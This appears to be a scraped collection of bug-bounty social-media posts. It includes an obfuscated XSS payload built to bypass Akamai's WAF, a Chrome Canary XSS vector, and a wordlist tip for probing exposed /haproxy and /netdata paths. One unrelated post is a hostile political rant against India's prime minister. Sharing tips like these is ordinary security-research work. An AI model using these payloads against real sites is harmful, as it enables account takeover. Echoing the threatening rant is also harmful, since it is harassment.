Arjun + Piper + Knoxnl + @KN0X55 = XSS
cc: @xnl_h4ck3r@KN0X55
Found a path for creating address.
Used Arjun for finding parameters
Used Knoxnl + Piper + Knoxss API key
Found Reflected XSS, Escalated to Account Takeover.
If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[].
Payload:
<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>
#Bugbounty#AkamaiBypass
If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰
#bugbountytips#BugBounty
@narendramodi What kind of PM are you. Because of you she had the most worst phase of her life. Things will change You will also see the worst phase in your life as well. That day you will remember how you tormented someone's life and efforts.
#uselessmodi#uselesspm
ooh, this works on Chrome Canary :D
<input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">
I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets!
Very Very useful on Large targets
https://t.co/U96KyE2fnE
#BugBounty#bugbountytips#infosec
I recently found a cool #RCE/path traversal bug on a target in Intigriti. It was rejected because of OoS :( But I am proud that I found this cool bug through a full manual testing of the endpoint. This video just simplifies the steps, but I took hours to figure out. #BugBounty